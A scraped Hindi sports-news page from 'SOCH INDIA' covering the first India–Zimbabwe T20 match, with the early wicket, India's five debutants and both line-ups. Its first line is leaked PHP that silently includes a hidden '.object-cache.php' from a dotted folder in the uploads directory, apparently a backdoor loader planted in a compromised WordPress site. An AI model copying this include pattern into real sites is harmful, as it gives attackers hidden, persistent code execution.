add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); INDvsZIM टी20 LIVE: जिम्बाब्वे को पहला झटका, हैमिल्टन आउट – SOCH INDIA
Menu

खेल
INDvsZIM टी20 LIVE: जिम्बाब्वे को पहला झटका, हैमिल्टन आउट

nobanner

5 नए खिलाड़ियों को मौका

वनडे में क्लीन स्वीप के बाद तीन मैचों की टी-20 सीरीज में शनिवार को टीम इंडिया हरारे स्पोर्ट्स क्लब मैदान पहले मैच में जिम्बाब्वे के खिलाफ जीत के इरादे से उतरी है. इंडिया ने टॉस जीतकर पहले गेंदबाजी का फैसला किया. महेंद्र सिंह धोनी की अगुवाई में युवा क्रिकेटरों की फौज वनडे में शानदार जीत से उत्साहित है.पांचवे ओवर में 33 रन के स्कोर पर जिम्बाब्वे का पहला विकेट गिरा. बुमराह की गेंद पर धोनी ने हैमिल्टन को कैच कर भारत को पहली सफलता दिलाई. हैमिल्टन ने 15 गेंदों में 25 रन बनाए थे.

दरअसल अब तक टीम इंडिया और जिम्बाब्वे के बीच 4 टी-20 मैच खेले गए हैं, जिनमें से 3 में टीम इंडिया जीत दर्ज की है जबकि 1 में हार हुई है. हालांकि पिछले टी-20 मैच में जिम्बाब्वे ने टीम इंडिया को मात दे दी थी.

5 नए खिलाड़ियों को मौका
भारत ने इस मैच में पांच नए खिलाड़ियों को मौका दिया है। पहली हार टी-20 अंतरराष्ट्रीय मैच में खेलने वाले खिलाड़ियों में ऋषि धवन, मंदीप सिह, जयदेव उनादकत, लोकेश राहुल और यजुवेंद्र चहल शामिल हैं.

दोनों टीमें:
भारत: लोकेश राहुल, मंदीप सिंह, अंबाती रायडू, मनीष पांडेय, केदार जाधव, महेंद्र सिंह धोनी (कप्तान), अक्षर पटेल, ऋषि धवन, जसप्रीत बुमराह, जयदेव उनादकत, यजुवेंद्र चहल

जिम्बाब्वे: चामुनओरवा चिबाबा, हेम्लिटन मासाकाड्जा, सिकंदर रजा बट, मैक्लम वालेर, एल्टन चिगम्बुरा, तिनोतेंडा मुतोम्बोद्जी, रिचमोंड मुतुम्बामी, ग्रेम क्रेमर, नेविल माद्जीवा, तौरेई मुजाराबानी और डोनाल्ड तिरिपानो.